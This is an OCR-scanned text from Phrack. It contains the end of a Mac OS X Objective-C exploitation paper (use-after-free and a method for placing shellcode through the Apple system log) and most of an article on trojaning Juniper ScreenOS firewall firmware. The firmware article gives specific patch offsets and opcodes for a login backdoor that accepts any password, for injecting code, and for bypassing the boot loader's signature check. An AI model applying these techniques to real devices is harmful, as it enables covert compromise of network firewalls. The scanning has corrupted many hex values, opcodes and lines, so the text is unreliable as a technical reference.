Starting program: /Users/dcbz/code/p66-objc/ofex3/hello AA 

talker: 0x103280 

Talker is: 4 bytes. 

buf @ 0x1032d0 

Hello World! 

objc[1288]: FREED(id): message release sent to freed object=0x103280 


Program received signal EXC_BAD_INSTRUCTION, Illegal instruction/operand. 
Ox90c65bfa in _objc_error () 

(gdb) x/i Spc 

Ox90c65bfa <_objc_errort116>: ud2a 

(gdb) 


This ud2a instruction is guaranteed to throw an Illegal instruction and 
terminate the process. This is Apple’s protection against double releases. 


If we look at what’s happening in the source we can see why this occurs. 


__private_extern IMP _class_lookupMethodAndLoadCache (Class cls, SEL sel) 
{ 


Class curClass; 
IMP methodPC = NULL; 


// Check for freed class 
if (cls == _class_getFreedObjectClass()) 
return (IMP) _freedHandler; 


As you can see, when the lookupMethodAndLoadCache function is called, 
(when the release method is called) the cls pointer is compared with the 
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result of the _class_getFreeObjectClass() function. This function returns 
the address of the previous class which was released by the runtime. If a 
match is found, the _freedHandler function is returned, rather than the 
desired method implementation. _freedHandler is responsible for outputting 
a message in syslog() and then using the ud2a instruction to terminate the 
process. 


This means that any method call on a free()’ed object will always 
error out. However, if another object is released inbetween, the behaviour 
is different. 


To investigate this we can use the following program: 


include <stdio.h> 
include <stdlib.h> 
import "Talker.h" 


int main(int ac, char **av) 


{ 


Talker *talker = [[Talker alloc] init]; 

Talker *talker2 = [[Talker alloc] init]; 

printf ("talker: Ox%x\n",talker); 

printf ("talker is: %i bytes.\n", malloc_size(talker)); 
if(ac != 2) { 

exit(1); 


} 
[talker release]; 
[talker2 release]; 
int 1; 
for(i=0; i<=50000 ; itt) { 
char *buf = strdup(av[1]); 
//printf ("buf @ 0x%x\n", buf); 
// leak badly 


} 
[talker say: "Hello World!"]J; 
[talker release]; 


} 


If we run this, with gdb attached, we can see that it crashes in the 
following instruction. 


(gdb) r aaaa 

The program being debugged has been started already. 

Start it from the beginning? (y or n) y 

Starting program: /Users/dcbz/code/p66-objc/ofex3/hello aaaa 
talker: 0x103280 

talker is: 16 bytes. 


Program received signal EXC_BAD_ACCESS, Could not access memory. 
Reason: KERN_INVALID_ADDRESS at address: 0x61616181 

0x90c75688 in objc_msgSend () 

(gdb) x/i Spc 

0x90c75688 <objc_msgSendt+24>: mov edi,DWORD PTR [edx+0x20] 


As you can see, this instruction (objc_msgSend+24) is our objc_msgSend call 
trying to look up the cache pointer from our object. The ISA pointer in edx 
contains the value 61616161 ("aaaa"). This is because our little for loop 
of heap allocations, eventually filled in the gaps in the heap, and 
overwrote our free’ed object. 


Once we control the ISA pointer in this instruction, the situation is again 
identical to a standard heap overflow of an Objective-C object. 


I will leave it again as an exercize for the reader to implement this. 


pon ves [ 6.1 - Side note: Updated shared_region technique. 
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In the previous section we used the shared_region technique to store our 
code in a fixed location in the address space of our vulnerable 
application. However, in order to do so, we required a file that was owned 
by root and controllable/readable by us. 


The file that we used: 


8 -rw-rw-r-- 1 root admin 4096 Apr 12 17:30 /Applications/.localized 


Was only writeable by the admin user, so this isn’t really a viable 
solution to the problem apple presented us with. 


As I said earlier, I’ve been away from Mac OS X for a while, so I haven’t 
had a chance to get around this new check, in the past. While I was writing 
this paper I was contemplating possible methods of defeating it. 


My first thought, was to find a suid which created a root owned file, 
controllable by us, and then sigstop it. However I did not find any suids 
which met our requirements with this. 


I also tried mounting a volume obeying file ownership which contained a 
previously created root owned file. However there is a check in the syscall 
which makes sure that our file is on the root volume, so that was outed. 


Finally I thought about log files. Something like syslog would be perfect 
where I could arbitrarily control the contents. The only problem with this 
idea is that no one in their right mind would allow their syslog to be 
world readable. 


This is when I stumbled across the "Apple system log facility." A.S.L? 
Amazingly apple took it upon themselves to reinvent the wheel. Apple syslog 
is designed to be readable by everyone on the system. By default any user 
can see sudo messages etc. 


The man page describes ASL as follows: 


DESCRIPTION 


These routines provide an interface to the Apple system log facility. They 
are intended to be a replacement for the syslog(3) API, which will continue 
to be supported for backwards compatibility. The new API allows client 
applications to create flexible, structured messages and send them to the 
syslogd server, where they may undergo additional processing. Messages 
received by the server are saved in a data store (subject to input filtering 
constraints). This API permits clients to create queries and search the 
message data store for matching messages. 


There’s even a section on security that seems to think allowing everyone to 
view your system log is a good thing... 


SECURITY 


Messages that are sent to the syslogd server may be saved 

in a message store. The store may be searched using asl_search, as 

described below. By default, all messages are readable by any user. 

However, some applications may wish to restrict read access for some 
messages. To accommodate this, a client may set a value for the "ReadUID" 
and "ReadGID" keys. These keys may be associated with a value 

containing an ASCII representation of a numeric UID or GID. Only the 

root user (UID 0), the user with the given UID, or a member of the group with 
the given GID may fetch access-controlled messages from the database. 


So basically we can use the "asl_log()" function to add arbitrary data to 
the log file. The log file is stored in /var/log/asl/YYYY.MM.DD.asl and as 
you can see below this file is world readable. This works perfect for what 
we need. 


344 -rw-r--r-- 1 root wheel 172377 Apr 12 18:40 
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/var/log/as1/2009.04.12.asl 


I wrote a tool "14-f-brazil.c" which basically takes some shellcode in 
argv[1] then sends it to the latest asl log with asl_log(). It then maps 
the last page of the log file straight into the shared section. 


I stuck a unique identifier: 


4#define NEMOKEY "--((NEMOKEY) )--:>>" 


before the shellcode in memory, and then just scanned memory in the shared 
mapping in the current process in order to locate the key, and therefore 
our shellcode. 


Here is the output from running the program: 


—[dcbz@megatron:”~/code]$ ./14-f-brazil ‘perl -e’print "\xcc"x20’ * 
+] opening logfile: /var/log/as1/2009.04.12.asl1. 

+] generating shellcode buffer to log. 

+] writing shellcode to logfile. 

+] creating shared mapping. 

file offset: 0x16000 

+] Waiting a bit. 

+] scanning memory for the shellcode... (this may crash). 

+] found shellcode at: Ox9ffff674. 


And as you can see in gdb, we have a nopsled at that address. 


—[dcbz@megatron:”~/code]$ gdb /bin/sh 
GNU gdb 6.3.50-20050815 (Apple version gdb-768) 


(gdb) r 
Starting program: /bin/sh 
“C[Switching to process 342 local thread 0x2elb] 


Ox8fe01010 in dyld__dyld_start () 
Quit 

(gdb) x/x Ox9ffff674 
Ox9ffff674: 0x90909090 
(gdb) 

Ox9ffff678: 0x90909090 
(gdb) 

Ox9ffff67c: 0x90909090 
(gdb) 

Ox9ffff680: 0x90909090 
(gdb) 

Ox9ffff684: 0x90909090 


Andrewg predicts that after this paper Apple will add a check to make sure 
that the file is executable, prior to mapping it into the shared section. 


Should be interesting to see if they do this. :p 


T’1l1l include 14-f-brazil.c in the uuencoded code at the end of this paper. 


-—-[ 6 — Conclusion 


Wow I can’t believe you guys actually read this far. That was a pretty long 

and painful ride. It seems like every time I start writing I remember how much I 
dislike writing and vow never to do it again, but after a few months I 

always forget and start on another topic. Hopefully this wasn’t as dry and 
boring in .txt format as it was in .ppt, although I’m definitly missing 

lolcat pictures in this version :(. 


I would like to take this time to thank the support drone at the Apple shop 
who fixed my Macbook for me after it was broken for the last 3 years. 
Without his help, there’s no way I would have ever finished this paper. 
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Again I’d like to thank my wife for her support. Also thanks to 
cloudburst/andrewg and the rest of felinemenace as well as various other 
people for discussing this stuff with me and allowing me to bounce ideas 
off you, TEAM HANZO reprezent! Thanks to dino and thoth for reading over 
the paper before I published it, to make sure I didn’t say anything TOO 
stupid. ;-) 


Anyone interested enough to read this far should definitly check out the 
Mac Hacker’s Handbook. I haven’t as of yet been able to buy a copy, I guess 
they’re all sold out in Australia, but from what I’ve seen so far the book 
looks great. 


later! 


—- nemo 
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==Phrack Inc.== 


Volume Ox0d, Issue 0x42, Phile #0x05 of Oxl1l 


[ Netscreen of the Dead: ] 
=-=[ Developing a Trojaned Firmware for Juniper ScreenOS Platforms J]=--= 


[ By graeme@lolux.net ] 


--[ Index 
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Ox3 -— The Attack 

Ox4 -— Live Evisceration 

Ox5 - Feeding on the Remains 
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0x8 — Netscreen of the Dead 

0x9 — Zombie Loader 

OxA -— 28 Hacks Later 

OxB - Closing Scene 

OxC — References 

OxD -— Credits 

OxE — Addendum 


--[{ Oxl - Trailer 


This article describes how an attacker can obtain, modify and install a 
modified version of Juniper ScreenOS which can run attacker supplied code 
which performs hidden operations or operations contrary to the 
configuration of any Juniper platform running Screenos. 


The attacker could be any one of the following: 

—- an attacker that has exploited a vulnerability in ScreenOs 

— someone who has illicitly obtained the administrator password 

— someone with physical access to the device (vendor / 3rd party support) 
- an attacker conducting a man-in-the-middle attack on the network 

—- a malicious administrator 


--[ 0x2 - Opening Scene 


Netscreens are manufactured by Juniper Inc and are all in one firewall, 
VPN, router security appliance. They range in scale from SME to Datacentre 
(NS5XP -- NS5000). Most are Common Criteria and FIPS certified and run a 
closed source, real time OS called ScreenOS which is supplied by Juniper 


as a binary firmware ‘blob’. 


The hardware used for this research was a Netscreen NS5XT containing an 

AMCC PowerPC 405 GP RISC processor and 64MB flash. The firmware used as 

the basis for modified firmware images was ScreenOS 5.3.0r10. Interfaces 
for administration are serial console, Telnet, SSH, and HTTP/HTTPS. The 

firmware can be installed from serial console, via the web interface or 

via TFTP. 


The configuration of the device is stored as a file on the flash and is 
independent of the firmware. 


--[{ 0x3 - The Attack 


The goal of the attack is to be able to install attacker modified firmware 
which provides hidden root control of the appliance. When attacking 
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firmware there are two vectors of attack: 


1. Live evisceration: debugging with remote GDB debugger over serial line 


2. Feeding on the remains: dead listing and static binary analysis using a 
disassembler and hex editor. 


The next two sections will discuss these two approaches and how successful 
they were in this specific instance. At this point it is worth noting some 
key features of the PowerPC hardware architecture: 

—- fixed instruction size of 4 bytes 

— flat memory model 

- 32 general purpose registers (r0-r31) 

-— no explicit stack but convention of using r01 

—- link register (lr) for returning to calling function 

— program counter (pc) for current instruction 

—- count register (ctr) for loop counter or return address 

—- exception register (xer) for exceptions, status and control 


Detailed information on the PowerPC architecture is available from the IBM 
PPC405 Embedded Processor Core User Manual which can be downloaded from 
http://www-01.ibm.com/chips/techlib/techlib.nsf/products/ 
PowerPC_405_Embedded_Cores 


--[ 0x4 - Live Evisceration 


For live debugging a GDB compiled for PowerPC was required. The Embedded 
Linux Development Kit (http://www.denx.de/wiki/DULG/ELDK) has GDB compiled 
for a number of embedded platforms including the PowerPC 403 and 405 
processors. This provides remote debugging of systems over a serial 
connection. 


Obviously no source for ScreenOS was available so it was necessary to 
create a custom GDB init file for displaying PPC registers and ’stack’ to 
provide useful information on breaks. GDB reads init files on startup and 
init files use the same syntax as GDB command files and are processed by 
GDB in the same way. The init file in your home directory (~/.gdbinit) can 
set options that affect subsequent processing of command line options and 
operands. An example gdb init file is supplied in the addendum. This gdb 
init file outputs context similar to the windows SoftICE tool which 
revers ngineers should be familiar with. Below is an example of a GDB 
session connected to a Netscreen: 


-—-start gdb session 


GNU gdb Red Hat Linux (6.7-1rh) 

Copyright (C) 2007 Free Software Foundation, Inc. 

License GPLv3+: GNU GPL version 3 or later 
<http://gnu.org/licenses/gpl.html> 

his is free software: you are free to change and redistribute it. 

There is NO WARRANTY, to th xtent permitted by law. Type "show copying" 
and "show warranty" for details. 

This GDB was configured as "-—-host=i686-pc-linux-gnu target=ppc-linux". 
he target architecture is set automatically (currently powerpc:403) 
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a 
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gdb>target remote /dev/ttyU0 
Ox0032bea4 in ?? () 

gdb> 

gdb>context 


powerpc 


[regs] 
r00:00000001 r01:03790528 r02:01358000 r03:FFFFFFFF pc: 0032BEA4 
r04:0000002E r05:00000000 r06:00000000 r07:00000000 
r08:01631050 r09:01350000 r10:01630000 r11:01630000 lr:0032C5CC 
r12:40000022 r13:00000000 r1l4:6FFFA27F r15:1B9FC3F7 
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r16:00000000 r17:402D04D0 r18:03791470 r19:00000000 ctr:0060A764 
r20:03790B48 r21:013509AC r22:FFFFFFFF 123:0379147E 
r24:00000000 r25:00000000 r26:00000000 r27:00000000 cr:40000028 
£28:03791470 r29:00000000 r30:03790F20 r31:0135098C xer:20000046 
[03790528] [stack] 
0379058C : 00 00 00 00 00 00 00 O00 00 00 00 00 00 00 00 O00 
03790570 00 00 00 00 00 00 00 O00 00 00 00 00 00 00 00 O00 
0379055A 00 00 00 00 00 00 00 O00 00 00 00 00 00 00 00 O00 
0379053E A6 40 03 79 06 CO 00 60 AI BC 00 00 00 00 00 00 .@y.* 
03790528 03 79 05 30 00 06 22 FO 03 79 03 79 O5 40 00 32 yO".yy@2 
03790512 00 01 03 79 12 58 03 79 05 20 OF 20 00 06 37 08 yXy 7 
037904F6 00 00 00 00 O00 05 01 62 9F AO C2 28 O01 4A 05 EA ...(J.. 
037904E0 03 79 04 E8 00 32 BE 60 03 79 03 79 14 70 01 4A y.2.‘yypJ 
037904C4 01 6F OA 24 03 79 04 EO 00 B8 00 00 00 6C 03 79 oSy..ly 
[0032BEA4] [code] 
Ox32bea4: lwz r0,12(r1) 
Ox32bea8: mtlr r0 
Ox32beac: addi riled 38 
Ox32beb0: blr 
Ox32beb4: stwu r1,-40(r1) 
Ox32beb8: mflr r0 
Ox32bebc: stw r29,28(r1) 
Ox32bec0: stw r30, 32 (r1) 
Ox32bec4: stw r31,36(r1) 
Ox32bec8: stw r0, 44 (r1) 
Ox32becc: mr r31,7"3 
Ox32bed0: lis £9; 322 
Ox32bed4: lwz r0,-13800(r9) 
Ox32bed8: cmpwi r0,0 
Ox32bedc: beq- Ox32bef0 
Ox32bee0: lis r3,196 
gdb> 
--end gdb session 
The steps for remote debugging on the Netscreen are as follows: 


1. Connect to a network interface and the serial console of the Netscreen 


from a P 


2. Over a telnet / SSH session to the Netscr 


Ce 


ns5xt>set gdb enable 
3. On the PC start gdbppc and connect to the remote gdb using: 
gdb>target remot 


/dev/ttyUSBO 


nabl 


GDB using: 


During this research remote debugging was useful for obtaining memory 
dumps and querying specific memory addresses. 
or single stepping did not appear to work. 
features working would be most appreciated by the author. 


Observing the boot process of the Netscr 
provide useful information regarding the boot up sequence: 


—-start boot sequence 


NetScreen NS-5XT Boot Loader Version 2.0.0 


Copyright (c) 


Total physical memory: 64MB 
Test - Pass 
Initialization - Done 

Hit any key to run loader 

Hit any key to run loader 

Hit any key to run loader 

Hit any key to run loader 


However setting breakpoints 
Information on how to get these 


n over a serial console did 


(Checksum: A1B6FF9B) 


1997-2003 NetScreen Technologies, 


Inc. 
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Loading default system image from on-board flash disk... 


Ignore image authentication! 


Start loading... 


Juniper Networks, Inc 
NS-5XT System Software 
Copyright, 1997-2004 


Version 5.3.0r10.0 

Load Manufacture Information ... Done 

Load NVRAM Information ... (5.3.0)Done 

Install module init vectors 

Verify ACL register default value (at hw reset) ... Done 
Verify ACL register read/write ... Done 

Verify ACL rule read/write ... Done 

Verify ACL rule search ... Done 

MD5 ("a") = Occl175b9 cOflb6a8 31¢399e2 69772661 

MD5 ("abc") = 90015098 3cd24fb0 d6963f7d 28e17£f72 

MD5 ("message digest") = £96b697d 7cb7938d 525a2f31 aaf161d0 
Verify DES register read/write ... Done 


Initial port mode trust-untrust (1) 
Install modules (00c40000,0146d540) ... load dns table 
dns table file do not exist. 


Initializing DI 1.1.0-ns 
System config (1129 bytes) loaded 


Done. 
Load System Configuration 


system init done.. 
System change state to Active(l1) 
login: 


--end of boot sequence 
Stored boot loader executes and the opportunity is given to load a new 


image over a serial connection. The default behaviour is then to 
uncompress the stored firmware and run the image. 


If a new image file is loaded over a serial console it is uncompressed 

and some options are presented. The first prompt allows saving the new 
image to flash. Even if the new image is not stored to flash the next 
prompt allows running the new image. No password is required to load an 
image over the serial line. 

The boot loader is part of the firmware and if the new boot loader is 
different from the version stored on the flash then the stored boot loader 
is overwritten by the new one. 


--[ 0x5 - Feeding on the Remains 


Static binary analysis was the main method employed in this research. 
ScreenOS images can be downloaded direct from the device or obtained from 
the Juniper website by Juniper customers. 


ScreenOS provides the following command to download the firmware over 
EECD: 


ns5xt>save software from flash to tftp 192.168.0.42 destination_file 
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It is important to note that this command downloads the compressed image 
file stored on the flash, not the currently running image from memory 
which may or may not be the same as the image file stored on the flash. 


Using an undocumented command all the files on the flash can be listed: 


ns5xt-> exec vfs ls flash:/ 


SNSBOOTS.BIN Spl, S44 
envar.rec 82 
golerd.rec 0 
node_secret.ace 0 
certfile.dsc 252 
certfile.dat 1,324 
ns_sys_config 129 
Slkg$.cfg 1,259 
syscert.cfg 1,167 


2,901,632 bytes free (7,686,144 total) on disk 


SNSBOOTS.BIN is the firmware stored on flash. To download this securely 
scp can be enabled on the Netscreen. Note the configuration of the device 
is stored in ns_sys_config. 


It is also possible to use GDB to dump the complete contents of the memory 
over a serial line. This is sloooow. 


gdb> set logging on 

gdb> set height 0 

gdb> set loging file ’ dump’ 
gdb> x /2048000000i 


As a Juniper customer I was able to download current and old versions of 
ScreenOS firmware. Many firmware versions were compared as a first step in 
determining the make up of the ScreenOS firmware images. The following 4 
section structure was revealed by this comparative analysis: 


0x00000000 / \ 
HEADER 
0x00000050 
0x00002020 
STUB 
0x00012940 
0x00012c00 
COMPRESSED BLOB 
~0x004e6000 \ / 


This is a similar format for other embedded firmware. 


Compressed Firmware Header 
The header consists of the following 4 byte fields making up 32 bytes: 


-— Signature (magic bytes) 

—- Information 4*1 byte fields: 00, Platform, CPU, Version (eg 0x00110A12) 
- Offset (for program entry point) 

- Address (for program entry point) 

- Size 

—- unknown 

—- unknown 

— Checksum 


5.txt Wed Apr 26 09:43:46 2017 6 


Points to note are 


the size field = (size of the compressed blob - 79 bytes) 
— signature = 0xEE16BA81 
- offset = 0x00000002 
— address = 0x02860000 


and these were always the same in the version 5 firmwares that were 
compared. Version 4 firmwares differed but were similar but these are old 
versions and I will not discuss them here. 


Stub 


The stub in the firmware image is responsible for uncompressing the blob 
when the device is booted. This stub contains strings relating to the LZMA 
algorithm so it was assumed that the compressed blob is an LZMA compressed 
binary blob. From the Wikipedia LZMA entry: "Decompression-only code for 
LZMA generally compiles to around 5kB and the amount of RAM required 
during decompression is principally determined by the size of the sliding 
window used during compression. Small code size and relatively low memory 
overhead, particularly with smaller dictionary lengths, and free source 
code make the LZMA decompression algorithm well-suited to embedded 
applications." 


Free LZMA utilities are available here: http://tukaani.org/lzma/ and as 
prebuilt packages for most *nix distributions. 


Compressed Blob 


The compressed blob is LZMA compressed and contains a header but this is a 
non-standard header. There are non-standard signature bytes for the stub 
to recognise the blob and the LZMA uncompresssed size field is missing. 


The standard LZMA header has 3 fields: 


options (2 bytes) 
dictionary_size (4 bytes) 
uncompressed_size (8 bytes) 


The blob header also has 3 fields but slightly different: 


signature (4 bytes) = 0x1440598 
options (2 bytes) 
dictionary_size (8 bytes) 


The dictionary size is used as a parameter in the compression algorithm. 
LZMA is a dictionary coder which I will not explain here but instead point 
the reader to http://en.wikipedia.org/wiki/Dictionary_coder. 


One approach would have been to attempt to use the header information and 
the stub to decompress the compressed blob but given a lack of PowerPC 
hardware a different approach was taken. The approach used was to cut out 
t 

i 


he compressed blob from the firmware and attempt to decompress it in 
solation using any tools available. Again using comparative anlalysis, 
the freely available LZMA utilities and direct modification of the header 
bytes the following methods for decompression and compression of the blob 
were revers ngineered. 


The decompression process: 

1. Cut out the compressed blob from the image file. 

2. Insert uncompressed_size equal to -1 which equals unknown size 
(-1l uncompresseed size = OXFFFFFFFFFFFFFFFF) 

3. Modify the dictionary_size from 0x00200000 to 0x00008000. 

4. Decompress the file using standard LZMA utilities. 


The modification of the dictionary size was found by fuzzing the field and 
then attempting to decompress. The decompression reports an error at the 
end of the decompression so it is important to decompress to a stream 
otherwise the decompressed data is lost. 
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The recompression process: 

1. Compress with standard LZMA utilities using specific compression 
options 

2. Modify the dictionary_size field 0x00002000 to 0x00200000. 

3. Delete the uncompressed_size field of 8 bytes. 

4. Concatenate with the header from the original image file. 


Proof of concept python scripts are provided in the Addendum which can 
perform the packing and unpacking of ScreenOS images. The LZMA utilities 
are necessary for operation of these scripts. 


The recompressed firmware successfully loads onto a Netscreen and runs. 
More research into the dictionary size field was going to be carried out 
but once loading of firmware was successful there were many other more 
interesting avenues of research which took precedence. 


--[ 0x6 - Night of the Living Netscreen 


So at this stage we have successfully revers ngineered the compression 
of the firmware. We are also in a position to revers ngineer th 
operating system obtained from the decompression. 


The steps are: 


Cut out the compressed blob section of the image 

Uncompress the blob. 

Re-compress the modified binary. 

Concatenate the original image header and the modified blob. 
Upgrade the Netscreen with the modified operating system. 


Ob WN FR 


So we can install the firmware if we have physical access to the device or 
some kind of funky remote serial console. But we want to be able to 
install firmware over the network. However on attempting to upload a new 
firmware via the device web interface or through the tftp command: 


ns5xt>save software from tftp x.x.x.x filename to flash 


loading fails with a ’bad image file data’ error. Note the insecur 
transport mechanism for the firmware. This is vulnerable to a man in the 
middle attack. 


We need to fix the size and checksum fields of the compressed firmware 
header. We know the size field needs to be set equal to the compressed 
firmware size - 79 bytes. But we do not yet know how the checksum field is 
calculated. To obtain the checksum algorithm we need to disassemble the 
uncompressed blob we have from decompressing the firmware. We will now 
discuss disassembling the binary and then move onto addressing the 
checksum issue. 


--[ 0x7 - Autopsy 
The uncompressed blob is an approximately 20Mb binary. We want to load 
the binary into IDA (a disassembler with PowerPC support) but we need a 
loading address so that relative addresses within the program point to the 
correct memory locations. Initially the binary was loaded at address 
0x00000000 but it is obvious that pointers to strings are not referencing 
the beginning of strings. 


The uncompressed blob contains a header with similarities to the 
compressed firmware header. The header fields contain a virtual address 
a 

W 


nd a header size. If we subtract the header size from the virtual address 
e have the loading address. 


Uncompressed Blob Header 


signature offset address 


00000000: E16BA81 00010110 00000020 00060000 


A 
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Gl 
je) 


ScreenOS Loading Address = 0x00060000 - 0x00000020 = Ox0OO5FF 


This can be confirmed with live debugging by using GDB and querying the 
memory at Ox0O005FFEO to check that the signature bytes OxEE16BA81 are at 
that memory location. 


We can now rebase the program in IDA to use the correct loading address. 
Now we have a correctly loaded binary but we do not know anything about 
the structure of the binary or the sections it may contain as the binary 
is not a recognised executable type. Code and data were marked using IDC 
scripts which searched for function prologs (0x9421F*) and string cross 
references. The approximate segments of the binary found by scripting and 
manual examination are sketched out in the very simplified illustration 
below: 


O0x0005ffe0 / \ 
| HEADER & 
| SCREENOS CODE 
0x00c40000 
| SCREENOS DATA 
O0x00f0efd8 
FILES 
OxO01llddab4 
BOOT LOADER CODE 
Ox011f2b4e 
BOOT LOADER DATA 
0x0140e04c 
OxFFs 
0x014171cf£ 
other stuff 


To build up a picture of the binary it is useful to search for functions 
such as str_cmp, file_read, file_write etc and use error strings to 
identify and name functions in IDA. 


The boot loader can be cut out and disassembled separately with a loading 
address of 0x00000000. 


--[ 0x8 - Netscreen of the Dead 


At this stage we are now ready to construct a ScreenOS Trojaned Firmware. 
Any trojan has three basic requirements: 


1. Delivery: It must be able to be installed remotely. 
2. Access: It must provide remote access / communication. 
3. Payload: It must provide attacker supplied code execution. 


During this research all modification of the ScreenOS binary to construct 
the trojaned version was hand crafted assembly inserted via hex editing 
the binary firmware. 


1. First Bite [ Delivery ] 

Unlike loading a firmware over a serial console at boot time, the 
checksum and size fields in the header are checked when images are loaded 
over the network via TFTP or the Web interfac 
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00000000: EE16BA81 00110A12 00000020 02860000 
00000010: O04E6016 15100050 29808000 C72C15F7 <-CHECKSUM 


The checksum is calculated as part of the image loading sequence and a 
disassembly of the relevant function is shown below...but on firmware 
loading any bad header checksum value is printed to the console with an 
error message. 
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If we binary modify the firmware to print out the correct checksum value 
we would have a ‘checksum calculator’ firmware which we can load modified 
firmware against to calculate valid checksums. So we don’t have to 
calculate or revers ngineer the checksum algorithm. This checksum 
calculator firmware can be loaded over serial console and new images we 
need to calculate the checksum for are loaded over TFTIP. The correct 
checksum will then be output to the console. This correct header value can 
then be inserted into the firmware header by direct hex editing of the 
image file. 


With a correct checksum field we can now load modified images via tftp and 
the web interfac 


Below is the ScreenOS code we need to modify to create a checksum 
calculator image. 


OO8B60EBE4 Ilwz %r4, O0x1C(%r31) S$r4 contains header checksum 
OO8B60E8 cmpw %r3, %r4 $x3 

contains calculated checksum 

OO8B60EC beq loc_8B6110 branch away if checksums matched 
OOS8B60FO lis %r3, aCksumXSizeD@h " cksum :%x size :%d\n" 

OO8B60F4 addi %r3, %r3, aCksumXSizeD@1l 

OO8B60F8 Ilwz $%r5, 0x10(%r31) 


OO8B60FC bl Print_to_Console $r4 is printed to console 
O0O08B6100 lis $%r3, alncorrectFirmw@h "Tncorrect firmware data" 
008B6104 addi %r3, %r3, aIncorrectFirmw@l 

008B6108 bl Print_to_Console 


If we replace 


OO8B60E8 cmpw Sr3, %r4 # x3 contains calculated checksum 
with 
OO8B60EC mr Sr4,%Sr3 # print out calculated checksum 


we have our checksum calculator firmware. 


For interested readers two checksum algorithms were identified at 
addresses and revers ngineering of these is certainly possible. 


One Bit{e} [ Access ] 

The most stealthy and elegant backdoor is to subvert the existing login 
mechanism. It may be possible to spawn a shell on another external port 
but this may be noticed from an external scan of the appliance and 
compromises the stealthiness of the trojaned firmware so further research 
into this was not carried out. 


Serial console, Telnet, Web and SSH all compare password hashes and use 
the same function for that comparison. Additionally SSH falls back to 
password authentication if the client does not supply a key, unless 
password authentication has been explicitly disabled. 


A one bit patch to the firmware provides a login with any password if a 
valid username is supplied. 


OO3F7FO4 mr %r4, S27 

OO3F7FO8 mr SL97 S230 

OO3F7FOC bl COMPARE_HASHES does a string compare 

OO3F7F10 cmpwi Sr3, 0 # equal if match 

OO3F7F14 bne loc_3F7F24 login fails if not equal (branch) 
OO3F7F18 li $rO, 2 

OO3F7F1C stw $rO, 0(%r29) 

OO3F7F20 b loc_3F7F28 


If we replace 
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OO3F7F10 cmpwi %r3, 0 # equal if match 
with 
0x397F30 cmpwi %Sr3, 1 # equal if they don’t match 


then any password EXCEPT a valid password will provide a login. 


We could patch 


OO3F7F14 bne loc_3F7F24 # login fails if not equal (branch) 


to 
OO3F7F14 bl loc_3F7F24 # login never fails (branch) 


to allow any password with a valid username to work. 


Infection [ Payload ] 


The last step for our working trojan is to be able to inject code into the 
firmware. First we need to find somewhere to inject the code we want 
xecuted. The ScreenOS code section contains a block of nulls large enough 
to include useful functionality at address 0x0031b4ac to 0x0031b4b0 


First we write our desired functionality in PowerPC assembly and replace a 
chunk of nulls with the hex values of the assembly opcodes. 


The steps to execute this code are: 

- Patch a branch in ScreenOS to call our code 

- Run our injected code which can potentially call ScreenOS functions 
—- Branch back to callee 


This code can be injected at address 0x002BB4E0 in the firmware and called 
from the login function of ScreenOSs: 


OO3F7F04 mr Sr4, x27 
OO3F7F08 mr 6r5, %xr30 
OO3F7FOC bl GET_HASHED_PASS # patch this to call our code 
OO3F7F10 cmpwi x3, 0 
OO3F7F14 bne loc_3F7F24 
OO3F7F18 li Sr0, 2 
OO3F7F1C stw $r0, O(%r29) 
OO3F7F20 b loc_3F7F28 

so 

O003£7£0c bl GET_HASHED_PASS 
becomes 

003f7£0c bl 0x31b4c0 


which will jump to the location containing the injected cod To inject 
code the PowerPC architecture features such as flat memory model, fixed 
width 4 byte instructions and the link register make this fairly 
straightforward to implement. A very simple proof of concept example, 
which prints out a string to the console on every login, is provided 
below: 


stwu SSP, -0x20 (Ssp) reserve some stack space 

mflr Sx0 minimal function prolog 

lis $xr3, string_msb_address load half of string 

addi Sr3, Sr3, string_lsb_address # load second half of string 
bl Print_To_Console call ScreenoOS function 
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mtir 6x0 
addi ssp, 0x20 minimal function epilog 
bl callee_function branch back to calling function 


As PowerPC has a fix instruction size of 4 bytes to load a 4 byte string 
we need two instructions. The first loads the most significant bytes - 

2 bytes for load instruction into register and 2 bytes of string, the 
second adds the least significant bytes to the register to give us 4 byte 
string. 


This asssembly is then translated in hex and patched into the firmware 
using a hex editor at absolute address 0x002bb4e0 overwriting existing 
nulls bytes: 


Ox002bb4b0: 93DFCAC4 4BD48E69 80010014 7C0803A6 

Ox002bb4c0: 83C10008 83E1000C 38210010 4E800020 

0x002bb4d0: 00000000 00000000 00000000 00000000 

Ox002bb4e0: 9421FFEO 7CO802A6 3C6000C4 386321BC <---- 
Ox002bb4f£0: 488ED7E9 60630001 7CO803A6 38210020 injected code 
0x002bb500: 480DCA31 00000000 00000000 00000000 -> 
0x002bb510: 00000000 00000000 00000000 00000000 


From revers ngineering we have identified a ScreenOS function which 
prints strings to the console. So here we have new functionality injected 
into the ScreenOS firmware which has new code but also calls builtin 
ScreenOS functionality. The string loaded can be one already existing in 
ScreenOS or a new one injected somewhere into the null byte area. 


Every time a user logins the string will be output to the serial console. 
--[ 0x9 - Zombie Loader 


ScreenOS does include a facility to validate firmware images and all 
Juniper firmware images are signed. Crucially though the validating 
certificate is NOT installed by default on any Netscreen AND anyone with 
administrator rights can delete and install the certifcate. To enable 
firmware image authentication it is necessary to obtain the certificate 
from the Juniper website and then upload the certificate to the device 
using the following command: 


save image-key tftp 129.168.0.40 image-key.cer 


In th xample above image-key is the certificate to be uploaded from the 
tftp server with IP address 192.168.0.40. Note the insecure transport 
mechanism for a cryptographic key. This is vulnerable to a man in the 
middle attack. 


The firmware authentication check code is present in the boot loader which 
we can modify to authenticate all firmware images or only non-Juniper 
images. It may also be possible to sign firmware with our own certificate 
and upload this to the Netscreen to be used for validation. 


Patching the Boot Loader to bypass certificate authentication. 
To bypass the firmware authentication check only one branch instruction 
needs to be patched: 


beq -> bl 0x4182001C -> 0x4800001C 

OO000D68C bl sub_98B8 

O000D690 cmpwi $r3, O # r3 has result of image validation 
0000D694 beg loc_D6BO # branch if passed 
O000D698 lis $r3, aBogusImageNotA@h # image not authenticated 
OO00D69C addi $r3, %Sr3, aBogusImageNotA@l 

OOOOD6A0 crclr 4*crlt+eq 

OOOOD6A4 bl sub_C8D0 

OOOOD6A8 li $r31, -1 

OOOOD6AC b loc_D6E0 
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If we replace 


O0000D694 beg loc_D6BO # branch if passed 

with 

0000D694 bl loc_D6BO0 # always branch, all images authenticated 
or this 

0000D694 bne loc_D6B0 # evil...only bogus images authenticated 
we can successfully load modified firmware even if a Juniper certificate 
is installed on the device. The boot loader is automatically upgraded when 


an image is loaded if the new boot loader differs from the existing. 
